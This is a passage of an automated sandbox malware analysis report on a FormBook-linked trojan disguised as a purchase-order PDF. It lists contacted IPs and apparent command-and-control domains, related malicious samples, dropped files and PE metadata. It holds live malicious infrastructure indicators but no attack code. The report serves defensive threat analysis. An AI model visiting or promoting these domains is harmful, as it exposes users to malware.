                                                                              https://www.fasthosts.co.uk/contact?utm_source=domainparking&utm_medium=referral&utm_campaign=fh_parROUTE.EXE, 00000008.00000002.3898549588.0000000004846000.00000004.10000000.00040000.00000000.sdmp, ROUTE.EXE, 00000008.00000002.3899866367.0000000005EE0000.00000004.00000800.00020000.00000000.sdmp, mIrIhAjAJblou.exe, 0000000A.00000002.3896717741.0000000004526000.00000004.00000001.00040000.00000000.sdmpfalse
                                                                              • Avira URL Cloud: safe
                                                                              		unknown

                                                                              World Map of Contacted IPs

                                                                              • No. of IPs < 25%
                                                                              • 25% < No. of IPs < 50%
                                                                              • 50% < No. of IPs < 75%
                                                                              • 75% < No. of IPs

                                                                              Public IPs

                                                                              IPDomainCountryFlagASNASN NameMalicious
                                                                              67.223.117.189
                                                                              		www.actionhub.liveUnited States
                                                                              		15189VIMRO-AS15189USfalse
                                                                              188.114.97.3
                                                                              		www.vh5g.sbsEuropean Union
                                                                              		13335CLOUDFLARENETUSfalse
                                                                              47.83.1.90
                                                                              		www.qzsazi.infoUnited States
                                                                              		3209VODANETInternationalIP-BackboneofVodafoneDEfalse
                                                                              84.32.84.32
                                                                              		truckgoway.infoLithuania
                                                                              		33922NTT-LT-ASLTfalse
                                                                              199.59.243.228
                                                                              		www.zucchini.proUnited States
                                                                              		395082BODIS-NJUSfalse
                                                                              136.243.64.147
                                                                              		100millionjobs.africaGermany
                                                                              		24940HETZNER-ASDEfalse
                                                                              134.122.133.80
                                                                              		zcdn.8383dns.comUnited States
                                                                              		64050BCPL-SGBGPNETGlobalASNSGfalse
                                                                              85.159.66.93
                                                                              		natroredirect.natrocdn.comTurkey
                                                                              		34619CIZGITRfalse
                                                                              213.171.195.105
                                                                              		www.aloezhealthcare.infoUnited Kingdom
                                                                              		8560ONEANDONE-ASBrauerstrasse48DEfalse

                                                                              General Information

                                                                              Joe Sandbox version:42.0.0 Malachite
                                                                              Analysis ID:1590629
                                                                              Start date and time:2025-01-14 11:59:56 +01:00
                                                                              Joe Sandbox product:CloudBasic
                                                                              Overall analysis duration:0h 9m 18s
                                                                              Hypervisor based Inspection enabled:false
                                                                              Report type:full
                                                                              Cookbook file name:default.jbs
                                                                              Analysis system description:Windows 10 x64 22H2 with Office Professional Plus 2019, Chrome 117, Firefox 118, Adobe Reader DC 23, Java 8 Update 381, 7zip 23.01
                                                                              Run name:Run with higher sleep bypass
                                                                              Number of analysed new started processes analysed:10
                                                                              Number of new started drivers analysed:0
                                                                              Number of existing processes analysed:0
                                                                              Number of existing drivers analysed:0
                                                                              Number of injected processes analysed:2
                                                                              Technologies:
                                                                              • HCA enabled
                                                                              • EGA enabled
                                                                              • AMSI enabled
                                                                              Analysis Mode:default
                                                                              Analysis stop reason:Timeout
                                                                              Sample name:PO 2025918 pdf.exe
                                                                              Detection:MAL
                                                                              Classification:mal100.troj.spyw.evad.winEXE@10/7@12/9
                                                                              EGA Information:
                                                                              • Successful, ratio: 75%
                                                                              HCA Information:
                                                                              • Successful, ratio: 91%
                                                                              • Number of executed functions: 90
                                                                              • Number of non-executed functions: 283
                                                                              Cookbook Comments:
                                                                              • Found application associated with file extension: .exe
                                                                              • Sleeps bigger than 100000000ms are automatically reduced to 1000ms
                                                                              • Sleep loops longer than 100000000ms are bypassed. Single calls with delay of 100000000ms and higher are ignored

                                                                              Warnings

                                                                              • Exclude process from analysis (whitelisted): dllhost.exe, WMIADAP.exe, SIHClient.exe, svchost.exe
                                                                              • Excluded IPs from analysis (whitelisted): 184.28.90.27, 20.109.210.53, 13.107.253.45, 13.95.31.18
                                                                              • Excluded domains from analysis (whitelisted): fs.microsoft.com, ocsp.digicert.com, slscr.update.microsoft.com, otelrules.azureedge.net, ctldl.windowsupdate.com, fe3cr.delivery.mp.microsoft.com
                                                                              • Not all processes where analyzed, report is missing behavior information
                                                                              • Report creation exceeded maximum time and may have missing disassembly code information.
                                                                              • Report size exceeded maximum capacity and may have missing behavior information.
                                                                              • Report size getting too big, too many NtCreateKey calls found.
                                                                              • Report size getting too big, too many NtOpenKeyEx calls found.
                                                                              • Report size getting too big, too many NtProtectVirtualMemory calls found.
                                                                              • Report size getting too big, too many NtQueryValueKey calls found.
                                                                              • Some HTTP raw data packets have been limited to 10 per session. Please view the PCAPs for the complete data.

                                                                              Simulations

                                                                              Behavior and APIs

                                                                              No simulations

                                                                              Joe Sandbox View / Context

                                                                              IPs

                                                                              MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                                                                              67.223.117.189foljNJ4bug.exeGet hashmaliciousFormBookBrowse
                                                                              • www.gutpox.life/bcpd/
                                                                              w64HYOhfv1.exeGet hashmaliciousFormBookBrowse
                                                                              • www.uburn.xyz/iqqs/
                                                                              enkJ6J7dAn.exeGet hashmaliciousFormBookBrowse
                                                                              • www.uburn.xyz/iqqs/
                                                                              PO-78140924.BAT.PDF.exeGet hashmaliciousFormBookBrowse
                                                                              • www.heldhold.xyz/fava/
                                                                              rP0n___87004354.exeGet hashmaliciousFormBookBrowse
                                                                              • www.heldhold.xyz/fava/
                                                                              Enquiry.exeGet hashmaliciousFormBookBrowse
                                                                              • www.uburn.xyz/iqqs/
                                                                              AWB_5771388044 Documenti di spedizione.exeGet hashmaliciousFormBookBrowse
                                                                              • www.uburn.xyz/unks/
                                                                              ncOLm62YLB.exeGet hashmaliciousFormBookBrowse
                                                                              • www.uburn.xyz/unks/
                                                                              DOC092024-0431202229487.exeGet hashmaliciousFormBookBrowse
                                                                              • www.heldhold.xyz/fava/
                                                                              LisectAVT_2403002B_466.exeGet hashmaliciousFormBookBrowse
                                                                              • www.techstone.top/d5fo/
                                                                              188.114.97.3trow.exeGet hashmaliciousUnknownBrowse
                                                                              • www.ftchat.com/
                                                                              gem2.exeGet hashmaliciousUnknownBrowse
                                                                              • wavepassage.cfd/STB/d2F2ZXBhc3NhZ2U=M.txt
                                                                              qbSIgCrCgw.exeGet hashmaliciousFormBookBrowse
                                                                              • www.zkdamdjj.shop/kf1m/
                                                                              8L6MBxaJ2m.exeGet hashmaliciousFormBookBrowse
                                                                              • www.rtpwslot888gol.sbs/jmkz/
                                                                              1SxKeB4u0c.exeGet hashmaliciousFormBookBrowse
                                                                              • www.rgenerousrs.store/o362/
                                                                              suBpo1g13Q.exeGet hashmaliciousFormBookBrowse
                                                                              • www.zkdamdjj.shop/swhs/
                                                                              k9OEsV37GE.exeGet hashmaliciousFormBookBrowse
                                                                              • www.einpisalpace.shop/8g74/?cNPH=WJ/rFpSuW7SUTonvHlYgJHet70+40/nSG+S456FFT70GKpWTD+yYW7KPXc3l6inPZ41lXlQU44ttBNcSIyPO/Awb2QEZq+eieNEXwOjUfdTJHvICblirwfj54bAbpLWz76fPuJmn0JFO&EtJTX=_JVX4ryxDRQpLJF
                                                                              wWXR5js3k2.exeGet hashmaliciousFormBookBrowse
                                                                              • www.supernutra01.online/rk61/
                                                                              NWPZbNcRxL.exeGet hashmaliciousFormBookBrowse
                                                                              • www.vh5g.sbs/rjsl/
                                                                              KSts9xW7qy.exeGet hashmaliciousFormBookBrowse
                                                                              • www.beylikduzu616161.xyz/2nga/?xP7x=Q2EbwnYhq4vEVEYxQpNjsu4gFlGHCs4lBliPtc8X0AIyDwowOCFGn/661E09vvaaF3LvgpjgW8Wvr6GWd63ULodNNE679jqiZ5mYQ2jjCrjO82Z0/3agI7E=&F4=Q0yHy

                                                                              Domains

                                                                              MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                                                                              zcdn.8383dns.comNew Order#12125.exeGet hashmaliciousFormBookBrowse
                                                                              • 134.122.135.48
                                                                              CSZ inquiry for MH raw material.exeGet hashmaliciousFormBookBrowse
                                                                              • 134.122.135.48
                                                                              CSZ inquiry for MH raw material.exeGet hashmaliciousFormBookBrowse
                                                                              • 134.122.135.48
                                                                              4p5XLVXJnq.exeGet hashmaliciousFormBookBrowse
                                                                              • 134.122.135.48
                                                                              k9OEsV37GE.exeGet hashmaliciousFormBookBrowse
                                                                              • 134.122.133.80
                                                                              9MZZG92yMO.exeGet hashmaliciousFormBookBrowse
                                                                              • 134.122.133.80
                                                                              NWPZbNcRxL.exeGet hashmaliciousFormBookBrowse
                                                                              • 134.122.133.80
                                                                              https://199.188.109.181Get hashmaliciousUnknownBrowse
                                                                              • 134.122.133.80
                                                                              0Z2lZiPk5K.exeGet hashmaliciousDarkTortilla, FormBookBrowse
                                                                              • 134.122.133.80
                                                                              DHL DOCS 2-0106-25.exeGet hashmaliciousFormBookBrowse
                                                                              • 134.122.135.48
                                                                              natroredirect.natrocdn.comPayment Notification Confirmation Documents 09_01_2025 Paper bill.exeGet hashmaliciousFormBookBrowse
                                                                              • 85.159.66.93
                                                                              Payment Notification Confirmation 010_01_2025.exeGet hashmaliciousFormBookBrowse
                                                                              • 85.159.66.93
                                                                              HN1GiQ5tF7.exeGet hashmaliciousFormBookBrowse
                                                                              • 85.159.66.93
                                                                              bIcqeSVPW6.exeGet hashmaliciousFormBookBrowse
                                                                              • 85.159.66.93
                                                                              WBI835q8qr.exeGet hashmaliciousFormBookBrowse
                                                                              • 85.159.66.93
                                                                              1SxKeB4u0c.exeGet hashmaliciousFormBookBrowse
                                                                              • 85.159.66.93
                                                                              uG3I84bQEr.exeGet hashmaliciousFormBookBrowse
                                                                              • 85.159.66.93
                                                                              bkTW1FbgHN.exeGet hashmaliciousFormBookBrowse
                                                                              • 85.159.66.93
                                                                              3HnH4uJtE7.exeGet hashmaliciousFormBookBrowse
                                                                              • 85.159.66.93
                                                                              KcSzB2IpP5.exeGet hashmaliciousFormBookBrowse
                                                                              • 85.159.66.93
                                                                              www.vh5g.sbsNWPZbNcRxL.exeGet hashmaliciousFormBookBrowse
                                                                              • 188.114.97.3
                                                                              www.zucchini.proPayment Notification Confirmation Documents 09_01_2025 Paper bill.exeGet hashmaliciousFormBookBrowse
                                                                              • 199.59.243.228
                                                                              rHP_SCAN_DOCUME.exeGet hashmaliciousFormBookBrowse
                                                                              • 199.59.243.228

                                                                              ASNs

                                                                              MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                                                                              CLOUDFLARENETUSABG Draft.scr.exeGet hashmaliciousMassLogger RAT, PureLog StealerBrowse
                                                                              • 104.21.64.1
                                                                              RENH3RE2025QUOTE.exeGet hashmaliciousMassLogger RAT, PureLog StealerBrowse
                                                                              • 104.21.80.1
                                                                              https://web.oncentrl.com/#/index/action?entityType=PUBLISHEDQUESTIONNAIRE&entityId=134955&actionType=PUBLISH&context=CLIENT_MGMT&recieverUserInfoId=68822Get hashmaliciousUnknownBrowse
                                                                              • 104.17.25.14
                                                                              random.exeGet hashmaliciousLummaCBrowse
                                                                              • 104.21.96.1
                                                                              https://akirapowered84501.emlnk.com/lt.php?x=3DZy~GDLVnab5KCs-Nu4WOae1qEoiN9xvxk1XaPMVXahD5B9-Uy.xuG-142imNHGet hashmaliciousUnknownBrowse
                                                                              • 104.17.205.31
                                                                              https://clients.dedicatedservicesusa.comGet hashmaliciousUnknownBrowse
                                                                              • 1.1.1.1
                                                                              Scanned-IMGS_from NomanGroup IDT.scr.exeGet hashmaliciousFormBookBrowse
                                                                              • 104.21.3.193
                                                                              Remittance.htmlGet hashmaliciousUnknownBrowse
                                                                              • 104.16.100.29
                                                                              http://binary-acceptance-hotel-difficult.trycloudflare.comGet hashmaliciousUnknownBrowse
                                                                              • 104.16.230.132
                                                                              random.exeGet hashmaliciousLummaCBrowse
                                                                              • 188.114.97.3
                                                                              NTT-LT-ASLTScanned-IMGS_from NomanGroup IDT.scr.exeGet hashmaliciousFormBookBrowse
                                                                              • 84.32.84.32
                                                                              New Order#12125.exeGet hashmaliciousFormBookBrowse
                                                                              • 84.32.84.32
                                                                              CSZ inquiry for MH raw material.exeGet hashmaliciousFormBookBrowse
                                                                              • 84.32.84.32
                                                                              CSZ inquiry for MH raw material.exeGet hashmaliciousFormBookBrowse
                                                                              • 84.32.84.32
                                                                              BalphRTkPS.exeGet hashmaliciousFormBookBrowse
                                                                              • 84.32.84.32
                                                                              PGK60fNNCZ.exeGet hashmaliciousFormBookBrowse
                                                                              • 84.32.84.32
                                                                              zAg7xx1vKI.exeGet hashmaliciousFormBookBrowse
                                                                              • 84.32.84.32
                                                                              5by4QM3v89.exeGet hashmaliciousFormBookBrowse
                                                                              • 84.32.84.32
                                                                              hgq5nzWJll.exeGet hashmaliciousFormBookBrowse
                                                                              • 84.32.84.32
                                                                              NFhRxwbegd.exeGet hashmaliciousFormBookBrowse
                                                                              • 84.32.84.32
                                                                              VODANETInternationalIP-BackboneofVodafoneDENew Order#12125.exeGet hashmaliciousFormBookBrowse
                                                                              • 47.83.1.90
                                                                              CSZ inquiry for MH raw material.exeGet hashmaliciousFormBookBrowse
                                                                              • 47.83.1.90
                                                                              elitebotnet.mpsl.elfGet hashmaliciousMirai, OkiruBrowse
                                                                              • 92.208.12.103
                                                                              elitebotnet.x86.elfGet hashmaliciousMirai, OkiruBrowse
                                                                              • 188.100.79.179
                                                                              MACHINE SPECIFICATIONS.exeGet hashmaliciousFormBookBrowse
                                                                              • 47.83.1.90
                                                                              CSZ inquiry for MH raw material.exeGet hashmaliciousFormBookBrowse
                                                                              • 47.83.1.90
                                                                              1001-13.exeGet hashmaliciousFormBookBrowse
                                                                              • 47.83.1.90
                                                                              6.elfGet hashmaliciousUnknownBrowse
                                                                              • 92.73.125.182
                                                                              6.elfGet hashmaliciousUnknownBrowse
                                                                              • 47.82.15.239
                                                                              res.arm5.elfGet hashmaliciousUnknownBrowse
                                                                              • 84.61.102.254
                                                                              VIMRO-AS15189USScanned-IMGS_from NomanGroup IDT.scr.exeGet hashmaliciousFormBookBrowse
                                                                              • 67.223.117.142
                                                                              ydJaT4b5N8.exeGet hashmaliciousFormBookBrowse
                                                                              • 67.223.118.94
                                                                              Nieuwebestellingen10122024.exeGet hashmaliciousFormBookBrowse
                                                                              • 67.223.117.169
                                                                              specification and drawing.exeGet hashmaliciousFormBook, PureLog StealerBrowse
                                                                              • 67.223.117.169
                                                                              dhl009544554961.INV.PEK.CO.041.20241115.183845.20241115.183948.34872.exeGet hashmaliciousFormBookBrowse
                                                                              • 67.223.117.169
                                                                              PO AT-5228.exeGet hashmaliciousFormBookBrowse
                                                                              • 67.223.117.142
                                                                              shipping doc_20241111.exeGet hashmaliciousFormBookBrowse
                                                                              • 67.223.117.142
                                                                              fHkdf4WB7zhMcqP.exeGet hashmaliciousFormBookBrowse
                                                                              • 67.223.118.17
                                                                              New PO [FK4-7173].pdf.exeGet hashmaliciousFormBookBrowse
                                                                              • 67.223.117.142
                                                                              SHIPPING DOC_20241107.exeGet hashmaliciousFormBookBrowse
                                                                              • 67.223.117.142

                                                                              JA3 Fingerprints

                                                                              No context

                                                                              Dropped Files

                                                                              No context

                                                                              Created / dropped Files

                                                                              C:\Users\user\AppData\Local\Microsoft\CLR_v4.0_32\UsageLogs\PO 2025918 pdf.exe.log

                                                                              Download File
                                                                              Process:C:\Users\user\Desktop\PO 2025918 pdf.exe
                                                                              File Type:ASCII text, with CRLF line terminators
                                                                              Category:dropped
                                                                              Size (bytes):1216
                                                                              Entropy (8bit):5.34331486778365
                                                                              Encrypted:false
                                                                              SSDEEP:24:MLUE4K5E4KH1qE4qXKDE4KhKiKhPKIE4oKNzKoZAE4Kze0E4x84j:MIHK5HKH1qHiYHKh3oPtHo6hAHKze0HJ
                                                                              MD5:1330C80CAAC9A0FB172F202485E9B1E8
                                                                              SHA1:86BAFDA4E4AE68C7C3012714A33D85D2B6E1A492
                                                                              SHA-256:B6C63ECE799A8F7E497C2A158B1FFC2F5CB4F745A2F8E585F794572B7CF03560
                                                                              SHA-512:75A17AB129FE97BBAB36AA2BD66D59F41DB5AFF44A705EF3E4D094EC5FCD056A3ED59992A0AC96C9D0D40E490F8596B07DCA9B60E606B67223867B061D9D0EB2
                                                                              Malicious:true
                                                                              Reputation:high, very likely benign file
                                                                              Preview:1,"fusion","GAC",0..1,"WinRT","NotApp",1..2,"System.Windows.Forms, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089",0..3,"System, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089","C:\Windows\assembly\NativeImages_v4.0.30319_32\System\920e3d1d70447c3c10e69e6df0766568\System.ni.dll",0..2,"System.Drawing, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b03f5f7f11d50a3a",0..3,"System.Core, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089","C:\Windows\assembly\NativeImages_v4.0.30319_32\System.Core\8b2c1203fd20aea8260bfbc518004720\System.Core.ni.dll",0..3,"System.Configuration, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b03f5f7f11d50a3a","C:\Windows\assembly\NativeImages_v4.0.30319_32\System.Configuration\2192b0d5aa4aa14486ae08118d3b9fcc\System.Configuration.ni.dll",0..3,"System.Xml, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089","C:\Windows\assembly\NativeImages_v4.0.30319_32\System.Xml\2062ed810929ec0e33254c02

                                                                              C:\Users\user\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive

                                                                              Download File
                                                                              Process:C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                                                              File Type:data
                                                                              Category:dropped
                                                                              Size (bytes):1172
                                                                              Entropy (8bit):5.342212839481937
                                                                              Encrypted:false
                                                                              SSDEEP:24:3s/WSKco4KmBs4RPT6BmFoUebIKomjKcmZ9t7J0gt/NKIl9r6dj:c/WSU4y4RQmFoUeWmfmZ9tK8NDE
                                                                              MD5:395D1F25EA33C342138E822744147A4E
                                                                              SHA1:7A9152F83D625D1CF117D59E0BB24D121FEE7070
                                                                              SHA-256:A82619AD08B159A97F7E88F36EADFAFB9B9CCEB12510C8F10D6E94AC07D8EF70
                                                                              SHA-512:456B8B2B4F85C0378E879B3ECC108FE1D7C88A2DF375847795C5BAA700F28059F9E66D1D4326F2FFE1F663CF5A027D8B108213F15D365E8410644EB56C71526F
                                                                              Malicious:false
                                                                              Preview:@...e................................._.'.......................P................1]...E...........(.Microsoft.PowerShell.Commands.ManagementH...............o..b~.D.poM......... .Microsoft.PowerShell.ConsoleHost0......................C.l]..7.s........System..4....................D...{..|f........System.Core.D...............4..7..D.#V.............System.Management.AutomationL.................*gQ?O.....x5.......#.Microsoft.Management.Infrastructure.<................t.,.lG....M...........System.Management...@................z.U..G...5.f.1........System.DirectoryServices4.................%...K... ...........System.Xml..8..................1...L..U;V.<}........System.Numerics.4.....................@.[8]'.\........System.Data.<...............i..VdqF...|...........System.ConfigurationH................WY..2.M.&..g*(g........Microsoft.PowerShell.Security...<...............V.}...@...i...........System.Transactions.P...............8..{...@.e..."4.......%.Microsoft.PowerShell.Com

                                                                              C:\Users\user\AppData\Local\Temp\-4108694

                                                                              Download File
                                                                              Process:C:\Windows\SysWOW64\ROUTE.EXE
                                                                              File Type:SQLite 3.x database, last written using SQLite version 3042000, page size 2048, file counter 8, database pages 89, cookie 0x36, schema 4, UTF-8, version-valid-for 8
                                                                              Category:dropped
                                                                              Size (bytes):196608
                                                                              Entropy (8bit):1.121297215059106
                                                                              Encrypted:false
                                                                              SSDEEP:384:72qOB1nxCkvSAELyKOMq+8yC8F/YfU5m+OlT:qq+n0E9ELyKOMq+8y9/Ow
                                                                              MD5:D87270D0039ED3A5A72E7082EA71E305
                                                                              SHA1:0FBACFA8029B11A5379703ABE7B392C4E46F0BD2
                                                                              SHA-256:F142782D1E80D89777EFA82C9969E821768DE3E9713FC7C1A4B26D769818AAAA
                                                                              SHA-512:18BB9B498C225385698F623DE06F93F9CFF933FE98A6D70271BC6FA4F866A0763054A4683B54684476894D9991F64CAC6C63A021BDFEB8D493310EF2C779638D
                                                                              Malicious:false
                                                                              Preview:SQLite format 3......@ .......Y...........6......................................................j............W........................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

                                                                              C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_1bmpbes2.dd4.psm1

                                                                              Download File
                                                                              Process:C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                                                              File Type:ASCII text, with no line terminators
                                                                              Category:dropped
                                                                              Size (bytes):60
                                                                              Entropy (8bit):4.038920595031593
                                                                              Encrypted:false
                                                                              SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                                                              MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                                                              SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                                                              SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                                                              SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                                                              Malicious:false
                                                                              Preview:# PowerShell test file to determine AppLocker lockdown mode

                                                                              C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_es4tnb5o.nnz.psm1

                                                                              Download File
                                                                              Process:C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                                                              File Type:ASCII text, with no line terminators
                                                                              Category:dropped
                                                                              Size (bytes):60
                                                                              Entropy (8bit):4.038920595031593
                                                                              Encrypted:false
                                                                              SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                                                              MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                                                              SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                                                              SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                                                              SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                                                              Malicious:false
                                                                              Preview:# PowerShell test file to determine AppLocker lockdown mode

                                                                              C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_fgryth2t.wk0.ps1

                                                                              Download File
                                                                              Process:C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                                                              File Type:ASCII text, with no line terminators
                                                                              Category:dropped
                                                                              Size (bytes):60
                                                                              Entropy (8bit):4.038920595031593
                                                                              Encrypted:false
                                                                              SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                                                              MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                                                              SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                                                              SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                                                              SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                                                              Malicious:false
                                                                              Preview:# PowerShell test file to determine AppLocker lockdown mode

                                                                              C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_xhpvkcdg.gy5.ps1

                                                                              Download File
                                                                              Process:C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                                                              File Type:ASCII text, with no line terminators
                                                                              Category:dropped
                                                                              Size (bytes):60
                                                                              Entropy (8bit):4.038920595031593
                                                                              Encrypted:false
                                                                              SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                                                              MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                                                              SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                                                              SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                                                              SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                                                              Malicious:false
                                                                              Preview:# PowerShell test file to determine AppLocker lockdown mode

                                                                              Static File Info

                                                                              General

                                                                              File type:PE32 executable (GUI) Intel 80386 Mono/.Net assembly, for MS Windows
                                                                              Entropy (8bit):7.753200255509009
                                                                              TrID:
                                                                              • Win32 Executable (generic) Net Framework (10011505/4) 49.83%
                                                                              • Win32 Executable (generic) a (10002005/4) 49.78%
                                                                              • Generic CIL Executable (.NET, Mono, etc.) (73296/58) 0.36%
                                                                              • Generic Win/DOS Executable (2004/3) 0.01%
                                                                              • DOS Executable Generic (2002/1) 0.01%
                                                                              File name:PO 2025918 pdf.exe
                                                                              File size:765'952 bytes
                                                                              MD5:625d2fae7b900a58c7e9daed1f85cab3
                                                                              SHA1:6c61eb8e5851778e4ed57044c50442dae2b875bd
                                                                              SHA256:d1a82af2d052117e637c17671568650659a93541083f107e4d1b2d357935928d
                                                                              SHA512:19ef418977acc405e15d90bcd2df26e2166824b7e142c8672acdc8f12ab0e50669aac0002c54587353fe1a92fcdbe5c7716191e5f4d9ed0726f4780f65253ffc
                                                                              SSDEEP:12288:wYRxA4Y5lyA/BxSPCj6HGXjxU70KoJZTb0r4d2SS8Kgqy4wenbJuuCkq64Qxhrok:nRnSWw9Ld2SA3n940hERompRZzK
                                                                              TLSH:30F40258632DE907C0621BB44932D3F823B59E89A621C7139BED3EFFBC76B462914351
                                                                              File Content Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L.....................0.................. ........@.. ....................... ............@................................

                                                                              File Icon

                                                                              Icon Hash:00928e8e8686b000

                                                                              Static PE Info

                                                                              General

                                                                              Entrypoint:0x4bc416
                                                                              Entrypoint Section:.text
                                                                              Digitally signed:false
                                                                              Imagebase:0x400000
                                                                              Subsystem:windows gui
                                                                              Image File Characteristics:EXECUTABLE_IMAGE, 32BIT_MACHINE
                                                                              DLL Characteristics:DYNAMIC_BASE, NX_COMPAT, NO_SEH, TERMINAL_SERVER_AWARE
                                                                              Time Stamp:0x8AEDD8A2 [Wed Nov 11 08:28:18 2043 UTC]
                                                                              TLS Callbacks:
                                                                              CLR (.Net) Version:
                                                                              OS Version Major:4
                                                                              OS Version Minor:0
                                                                              File Version Major:4
                                                                              File Version Minor:0
                                                                              Subsystem Version Major:4
                                                                              Subsystem Version Minor:0
                                                                              Import Hash:f34d5f2d4577ed6d9ceec516c1f5a744

                                                                              Entrypoint Preview

                                                                              Instruction
                                                                              jmp dword ptr [00402000h]
                                                                              call far 0000h : 003E9999h
                                                                              aas
                                                                              int CCh
                                                                              dec esp
                                                                              add byte ptr [eax], al
                                                                              add byte ptr [eax], al
                                                                              add byte ptr [eax], al
                                                                              add byte ptr [eax], al
                                                                              add byte ptr [eax], al
                                                                              add byte ptr [eax], al
                                                                              add byte ptr [eax], al
                                                                              add byte ptr [eax], al
                                                                              add byte ptr [eax], al
                                                                              add byte ptr [eax], al
                                                                              add byte ptr [eax], al
                                                                              add byte ptr [eax], al
                                                                              add byte ptr [eax], al
                                                                              add byte ptr [eax], al
                                                                              add byte ptr [eax], al
                                                                              add byte ptr [eax], al
                                                                              add byte ptr [eax], al
                                                                              add byte ptr [eax], al
                                                                              add byte ptr [eax], al
                                                                              add byte ptr [eax], al
                                                                              add byte ptr [eax], al
                                                                              add byte ptr [eax], al
                                                                              add byte ptr [eax], al
                                                                              add byte ptr [eax], al
                                                                              add byte ptr [eax], al
                                                                              add byte ptr [eax], al
                                                                              add byte ptr [eax], al
                                                                              add byte ptr [eax], al
                                                                              add byte ptr [eax], al
                                                                              add byte ptr [eax], al
                                                                              add byte ptr [eax], al
                                                                              add byte ptr [eax], al
                                                                              add byte ptr [eax], al
                                                                              add byte ptr [eax], al
                                                                              add byte ptr [eax], al
                                                                              add byte ptr [eax], al
                                                                              add byte ptr [eax], al
                                                                              add byte ptr [eax], al
                                                                              add byte ptr [eax], al
                                                                              add byte ptr [eax], al
                                                                              add byte ptr [eax], al
                                                                              add byte ptr [eax], al
                                                                              add byte ptr [eax], al
                                                                              add byte ptr [eax], al
                                                                              add byte ptr [eax], al
                                                                              add byte ptr [eax], al
                                                                              add byte ptr [eax], al
                                                                              add byte ptr [eax], al
                                                                              add byte ptr [eax], al
                                                                              add byte ptr [eax], al
                                                                              add byte ptr [eax], al
                                                                              add byte ptr [eax], al
                                                                              add byte ptr [eax], al
                                                                              add byte ptr [eax], al
                                                                              add byte ptr [eax], al
                                                                              add byte ptr [eax], al
                                                                              add byte ptr [eax], al
                                                                              add byte ptr [eax], al
                                                                              add byte ptr [eax], al
                                                                              add byte ptr [eax], al
                                                                              add byte ptr [eax], al
                                                                              add byte ptr [eax], al
                                                                              add byte ptr [eax], al
                                                                              add byte ptr [eax], al
                                                                              add byte ptr [eax], al
                                                                              add byte ptr [eax], al
                                                                              add byte ptr [eax], al
                                                                              add byte ptr [eax], al
                                                                              add byte ptr [eax], al
                                                                              add byte ptr [eax], al
                                                                              add byte ptr [eax], al
                                                                              add byte ptr [eax], al
                                                                              add byte ptr [eax], al
                                                                              add byte ptr [eax], al
                                                                              add byte ptr [eax], al
                                                                              add byte ptr [eax], al
                                                                              add byte ptr [eax], al
                                                                              add byte ptr [eax], al
                                                                              add byte ptr [eax], al
                                                                              add byte ptr [eax], al
                                                                              add byte ptr [eax], al
                                                                              add byte ptr [eax], al
                                                                              add byte ptr [eax], al
                                                                              add byte ptr [eax], al
                                                                              add byte ptr [eax], al
                                                                              add byte ptr [eax], al
                                                                              add byte ptr [eax], al
                                                                              add byte ptr [eax], al
                                                                              add byte ptr [eax], al
                                                                              add byte ptr [eax], al
                                                                              add byte ptr [eax], al

                                                                              Data Directories

                                                                              NameVirtual AddressVirtual Size Is in Section
                                                                              IMAGE_DIRECTORY_ENTRY_EXPORT0x00x0
